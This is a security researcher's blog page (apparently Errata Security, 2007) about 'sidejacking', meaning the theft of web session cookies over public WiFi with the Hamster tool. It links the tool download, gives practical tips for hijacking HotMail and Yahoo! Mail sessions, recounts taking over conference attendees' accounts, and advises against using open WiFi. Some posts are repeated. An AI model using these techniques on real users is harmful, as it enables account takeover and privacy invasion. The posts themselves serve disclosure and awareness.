As a contribution to the incredibly awesome Security B-Sides unconference in Atlanta, the gang at Errata Security has put together a free training class based on our techniques for completing a professional wireless penetration test. We'll be going over the 5 basic areas of the "gold standard" wireless security assessment, as we do from time to time for a living.
To see what prerequisite knowledge is required to participate, and to register for the class (only a few spots left!), please
Showing posts with label sidejacking. Show all posts
Showing posts with label sidejacking. Show all posts
Saturday, September 18, 2010
Sunday, August 05, 2007
SideJacking with Hamster
NOTE: you can download the program at http://www.erratasec.com/sidejacking.zip; make sure to read the instructions.
Others have done a better job blogging on my Hamster/SideJacking stuff than I could, so I'll just link to their sites: [DarkReading] [Brian Krebs] [tgdaily] [George Ou] (George has screenshots).
This isn't really "new" in theory. Man-in-the-middle on public WiFi's can do this sort of thing. Also, stealing cookies via XSS (Cross Site Scripting) can also do this for the hacker. What makes this interesting is that it's point-and-click easy with a sniffer on WiFi hotspots.
I played around with the "Wall of Sheep" yesterday at DefCon. I was owning more accounts using my tools than everyone else using Dsniff and EtterCap. I spent most of my time hunting for people using HotMail or Yahoo! Mail - I could have gotten a lot more accounts if I focused just on Gmail instead (it's like 20-to-one the ratio of DefCon attendees using Gmail vs. other online e-mail accounts).
I gave out my tools to a bunch of people personally, I'll be officially posting the tools on Monday afternoon to our website. Also, you can do this manually by using a traditional packet-sniffer and a tool like the Edit Cookies add-on for Firefox.
While copying/replaying cookies sounds easy, there are some additional tricks to it that I've found in practice. One trick is that URLs also contain unique identifiers. In order to sidejack a HotMail or Yahoo! Mail connection, you have to know which URL to use. The other is that when starting in the middle of a session, you see the "Cookie:" commands the browser sends to the server, but not the "Set-Cookie:" commands the server sent in the opposite direction. Sometimes things don't work because when I clone cookies sent with the path /aaa/bbb, I won't know that I should also send them with the path /aaa/ccc. I've found that when you gain access to a site, but the access is flaky, if you start browsing around the site, you'll eventually get the correct "Set-Cookie:" from the server, then everything will work correctly.
Others have done a better job blogging on my Hamster/SideJacking stuff than I could, so I'll just link to their sites: [DarkReading] [Brian Krebs] [tgdaily] [George Ou] (George has screenshots).
This isn't really "new" in theory. Man-in-the-middle on public WiFi's can do this sort of thing. Also, stealing cookies via XSS (Cross Site Scripting) can also do this for the hacker. What makes this interesting is that it's point-and-click easy with a sniffer on WiFi hotspots.
I played around with the "Wall of Sheep" yesterday at DefCon. I was owning more accounts using my tools than everyone else using Dsniff and EtterCap. I spent most of my time hunting for people using HotMail or Yahoo! Mail - I could have gotten a lot more accounts if I focused just on Gmail instead (it's like 20-to-one the ratio of DefCon attendees using Gmail vs. other online e-mail accounts).
I gave out my tools to a bunch of people personally, I'll be officially posting the tools on Monday afternoon to our website. Also, you can do this manually by using a traditional packet-sniffer and a tool like the Edit Cookies add-on for Firefox.
While copying/replaying cookies sounds easy, there are some additional tricks to it that I've found in practice. One trick is that URLs also contain unique identifiers. In order to sidejack a HotMail or Yahoo! Mail connection, you have to know which URL to use. The other is that when starting in the middle of a session, you see the "Cookie:" commands the browser sends to the server, but not the "Set-Cookie:" commands the server sent in the opposite direction. Sometimes things don't work because when I clone cookies sent with the path /aaa/bbb, I won't know that I should also send them with the path /aaa/ccc. I've found that when you gain access to a site, but the access is flaky, if you start browsing around the site, you'll eventually get the correct "Set-Cookie:" from the server, then everything will work correctly.
Monday, May 14, 2007
Blogging Toorcon/Seattle
The San Diego cybersecurity convention Toorcon has branched northwards with a cool concept. This year, they had a small con (150 people) on the weekend after BlueHat (Microsoft's internal cybersecurity con). It was in a small bar, talks lasted 20 minutes, and ended in with an hour of 5 minute "lightning" talks. The format rocked, hard.
I want to apologize for my talk. My talk was later in the day, so in the time leading up to the talk I was sniffing the wireless. (I wasn't alone, MANY other people were also sniffing the wireless). I started my talk by showing the sorts of things I could sniff about somebody, such as their AIM buddy list, their DNS requests, alternate e-mail addresses they use, and so forth. The person I showed was somebody that had a diverse set of information, but not somebody who was doing anything embarrassing. I specifically chose NOT to 'out' the attendee who was surfing gay porn during the talks (although I probably should have, since virtually nobody who goes to cybersecurity cons would be embarrassed by surfing gay porn). However, even if nothing embarrassing is shown, it's still embarrassing feeling a bit exposed like that (although, I should repeat: a lot of people will sniffing the traffic as well, my talk just exposed it).
The moral of the story is: DON'T USE OPEN WIFI AT CYBERSECURITY CONVENTIONS. Seriously, any wifi is dangerous. The dangers are:
1. I can sniff more interesting bits out of your traffic than you realize
2. I can hijack (or "sidejack") the web accounts you log onto
3. I can grab control of your browser (download history, cached passwords, etc.)
4. I can probably break into your machine
5. This works on Internet Explorer and Firefox on Mac, Linux, and Windows
6. …all using well-known, unpatched (and often unpatchable) techniques
I've already released my Ferret tool that sniffs interesting info (like I showed at the start of my talk). I'm going to be releasing my "sidejacking" tool that sniffs Web/2.0 session IDs, allow other people on the same wifi to gain access to your accounts even without man-in-the-middle attacks. I'm going to be releasing a "man-in-the-middle" tool that inserts JavaScript into your browser, essentially making every website you visit vulnerable to Cross Site Scripting (XSS) attacks against your browser.
There are two good alternatives to public wifi. The first is to setup a box at home and VPN to it, and harden the wifi adapter so that none of your normal system applications (e.g. NetBIOS) are bound to it.
The second alternative is mobile broadband like GPRS, EDGE, HSDPA, or EVDO. You can often access the Internet by "tethering" your mobile phone, or get one of the new notebooks with built-in adapters.
It's interesting to see that public wifi is still growing fast, with cities all across the United State creating municipal wifi networks. This means that more and more hackers will be attacking it. Now is a good time to start weaning yourself off of it.
I want to apologize for my talk. My talk was later in the day, so in the time leading up to the talk I was sniffing the wireless. (I wasn't alone, MANY other people were also sniffing the wireless). I started my talk by showing the sorts of things I could sniff about somebody, such as their AIM buddy list, their DNS requests, alternate e-mail addresses they use, and so forth. The person I showed was somebody that had a diverse set of information, but not somebody who was doing anything embarrassing. I specifically chose NOT to 'out' the attendee who was surfing gay porn during the talks (although I probably should have, since virtually nobody who goes to cybersecurity cons would be embarrassed by surfing gay porn). However, even if nothing embarrassing is shown, it's still embarrassing feeling a bit exposed like that (although, I should repeat: a lot of people will sniffing the traffic as well, my talk just exposed it).
The moral of the story is: DON'T USE OPEN WIFI AT CYBERSECURITY CONVENTIONS. Seriously, any wifi is dangerous. The dangers are:
1. I can sniff more interesting bits out of your traffic than you realize
2. I can hijack (or "sidejack") the web accounts you log onto
3. I can grab control of your browser (download history, cached passwords, etc.)
4. I can probably break into your machine
5. This works on Internet Explorer and Firefox on Mac, Linux, and Windows
6. …all using well-known, unpatched (and often unpatchable) techniques
I've already released my Ferret tool that sniffs interesting info (like I showed at the start of my talk). I'm going to be releasing my "sidejacking" tool that sniffs Web/2.0 session IDs, allow other people on the same wifi to gain access to your accounts even without man-in-the-middle attacks. I'm going to be releasing a "man-in-the-middle" tool that inserts JavaScript into your browser, essentially making every website you visit vulnerable to Cross Site Scripting (XSS) attacks against your browser.
There are two good alternatives to public wifi. The first is to setup a box at home and VPN to it, and harden the wifi adapter so that none of your normal system applications (e.g. NetBIOS) are bound to it.
The second alternative is mobile broadband like GPRS, EDGE, HSDPA, or EVDO. You can often access the Internet by "tethering" your mobile phone, or get one of the new notebooks with built-in adapters.
It's interesting to see that public wifi is still growing fast, with cities all across the United State creating municipal wifi networks. This means that more and more hackers will be attacking it. Now is a good time to start weaning yourself off of it.
Subscribe to:
Posts (Atom)